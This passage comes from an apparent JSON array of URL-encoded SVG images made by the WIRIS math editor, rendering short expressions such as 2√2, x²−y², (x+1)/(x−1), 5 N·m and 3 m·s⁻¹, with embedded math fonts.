0x%3D%2273.5%22%20y%3D%2216%22%3E)%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2223%22%20width%3D%2235%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmsqrt%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsqrt%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2219%22%3E2%3C%2Ftext%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%2212%2C-16%2011%2C-16%205%2C0%202%2C-6%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(9.5%2C20.5)%22%2F%3E%3Cpolyline%20fill%3D%22none%22%20points%3D%225%2C0%202%2C-6%200%2C-5%22%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20transform%3D%22translate(9.5%2C20.5)%22%2F%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2221.5%22%20x2%3D%2233.5%22%20y1%3D%224.5%22%20y2%3D%224.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2227.5%22%20y%3D%2219%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2222%22%20width%3D%2248%22%20wrs%3Abaseline%3D%2218%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmsup%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsup%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmsup%3E%3Cmi%3Ey%3C%2Fmi%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2218%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2212.5%22%20y%3D%2211%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2218%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2235.5%22%20y%3D%2218%22%3Ey%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2243.5%22%20y%3D%2211%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmi%3Ey%3C%2Fmi%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2216.5%22%20y%3D%2216%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2228.5%22%20y%3D%2216%22%3Ey%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2219%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E24%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%229.5%22%20y%3D%2215%22%3E24%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2243%22%20width%3D%2242%22%20wrs%3Abaseline%3D%2227%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmfrac%3E%3Cmrow%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmn%3E1%3C%2Fmn%3E%3C%2Fmrow%3E%3Cmrow%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmn%3E1%3C%2Fmn%3E%3C%2Fmrow%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1f49eb453fa539158a42c727cab'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADxjdnQgDVUNBwAAAVgAAAA6Z2x5ZoPi2VsAAAGUAAAA62hlYWQQC2qxAAACgAAAADZoaGVhCGsXSAAAArgAAAAkaG10eE2rRkcAAALcAAAADGxvY2EAHTwYAAAC6AAAABBtYXhwBT0FPgAAAvgAAAAgbmFtZaBxlY4AAAMYAAABn3Bvc3QB9wD6AAAEuAAAACBwcmVwa1uragAABNgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACsiEv%2F%2FAAAAKyIS%2F%2F%2F%2F1t3wAAEAAAAAAAAAAAFUAywAgAEAAFYAKgJYAh4BDgEsAiwAWgGAAoAAoADUAIAAAAAAAAAAKwBVAIAAqwDVAQABKwAHAAAAAgBVAAADAAOrAAMABwAAMxEhESUhESFVAqv9qwIA%2FgADq%2FxVVQMAAAEAgABVAtUCqwALAEkBGLIMAQEUExCxAAP2sQEE9bAKPLEDBfWwCDyxBQT1sAY8sQ0D5gCxAAATELEBBuSxAQETELAFPLEDBOWxCwX1sAc8sQkE5TEwEyERMxEhFSERIxEhgAEAVQEA%2FwBV%2FwABqwEA%2FwBW%2FwABAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAABAAAAAQAA1XjOQV8PPPUAAwQA%2F%2F%2F%2F%2F9Y6E3P%2F%2F%2F%2F%2F1joTcwAA%2FyAEgAOrAAAACgACAAEAAAAAAAEAAAPo%2F2oAABdwAAD%2FtgSAAAEAAAAAAAAAAAAAAAAAAAADA1IAVQNWAIADVgCAAAAAAAAAACgAAAChAAAA6wABAAAAAwBeAAUAAAAAAAIAgAQAAAAAAAQAAN4AAAAAAAAAFQECAAAAAAAAAAEAEgAAAAAAAAAAAAIADgASAAAAAAAAAAMAMAAgAAAAAAAAAAQAEgBQAAAAAAAAAAUAFgBiAAAAAAAAAAYACQB4AAAAAAAAAAgAHACBAAEAAAAAAAEAEgAAAAEAAAAAAAIADgASAAEAAAAAAAMAMAAgAAEAAAAAAAQAEgBQAAEAAAAAAAUAFgBiAAEAAAAAAAYACQB4AAEAAAAAAAgAHACBAAMAAQQJAAEAEgAAAAMAAQQJAAIADgASAAMAAQQJAAMAMAAgAAMAAQQJAAQAEgBQAAMAAQQJAAUAFgBiAAMAAQQJAAYACQB4AAMAAQQJAAgAHACBAE0AYQB0AGgAIABGAG8AbgB0AFIAZQBnAHUAbABhAHIATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlACAATQBhAHQAaAAgAEYAbwBuAHQATQBhAHQAaAAgAEYAbwBuAHQAVgBlAHIAcwBpAG8AbgAgADEALgAwTWF0aF9Gb250AE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAAAwAAAAAAAAH0APoAAAAAAAAAAAAAAAAAAAAAAAAAALkHEQAAjYUYALIAAAAVFBOxAAE%2F)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%222.5%22%20x2%3D%2238.5%22%20y1%3D%2221.5%22%20y2%3D%2221.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2216%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f49eb453fa539158a42c727cab%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2220.5%22%20y%3D%2216%22%3E%2B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2232.5%22%20y%3D%2216%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2239%22%3Ex%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f49eb453fa539158a42c727cab%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2220.5%22%20y%3D%2239%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2232.5%22%20y%3D%2239%22%3E1%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2247%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E5%3C%2Fmn%3E%3Cmo%3E%26%23xA0%3B%3C%2Fmo%3E%3Cmtext%3EN%3C%2Fmtext%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmtext%3Em%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1cedebb6e872f539bef8c3f9198'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAW2hlYWQQC2qxAAAB6AAAADZoaGVhCGsXSAAAAiAAAAAkaG10eE2rRkcAAAJEAAAACGxvY2EAHTwYAAACTAAAAAxtYXhwBT0FPgAAAlgAAAAgbmFtZaBxlY4AAAJ4AAABn3Bvc3QB9wD6AAAEGAAAACBwcmVwa1uragAABDgAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAALf%2F%2FwAAALf%2F%2F%2F9KAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQDrAcAAAwAbGAGwBBCxAAP0sQID9LEFA%2FQAsAQQsQMG9DAxEzMVI4BrawHAawAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUBawCAAAAAAAAAACgAAABbAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E5%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2219.5%22%20y%3D%2216%22%3EN%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1cedebb6e872f539bef8c3f9198%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2229.5%22%20y%3D%2216%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2239.5%22%20y%3D%2216%22%3Em%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%229%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmtext%3EJ%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2215%22%3EJ%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2223%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmtext%3Em%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2215%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2215.5%22%20y%3D%2215%22%3Em%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2231%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmtext%3Ekm%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2215%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2219.5%22%20y%3D%2215%22%3Ekm%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2222%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmtext%3Ekm%3C%2Fmtext%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2210.5%22%20y%3D%2215%22%3Ekm%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2223%22%20width%3D%2256%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E3%3C%2Fmn%3E%3Cmtext%3Em%3C%2Fmtext%3E%3Cmo%3E%26%23xB7%3B%3C%2Fmo%3E%3Cmsup%3E%3Cmtext%3Es%3C%2Fmtext%3E%3Cmrow%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmn%3E1%3C%2Fmn%3E%3C%2Fmrow%3E%3C%2Fmsup%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1f9ece33f131ce1a9507d2cf938'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADxjdnQgDVUNBwAAAVgAAAA6Z2x5ZoPi2VsAAAGUAAAApWhlYWQQC2qxAAACPAAAADZoaGVhCGsXSAAAAnQAAAAkaG10eE2rRkcAAAKYAAAADGxvY2EAHTwYAAACpAAAABBtYXhwBT0FPgAAArQAAAAgbmFtZaBxlY4AAALUAAABn3Bvc3QB9wD6AAAEdAAAACBwcmVwa1uragAABJQAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACALciEv%2F%2FAAAAtyIS%2F%2F%2F%2FSt3wAAEAAAAAAAAAAAFUAywAgAEAAFYAKgJYAh4BDgEsAiwAWgGAAoAAoADUAIAAAAAAAAAAKwBVAIAAqwDVAQABKwAHAAAAAgBVAAADAAOrAAMABwAAMxEhESUhESFVAqv9qwIA%2FgADq%2FxVVQMAAAEAgAFVAOsBwAADABsYAbAEELEAA%2FSxAgP0sQUD9ACwBBCxAwb0MDETMxUjgGtrAcBrAAEAgAFVAtUBqwADADAYAbAEELEAA%2FawAzyxAgf1sAE8sQUD5gCxAAATELEABuWxAAETELABPLEDBfWwAjwTIRUhgAJV%2FasBq1YAAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3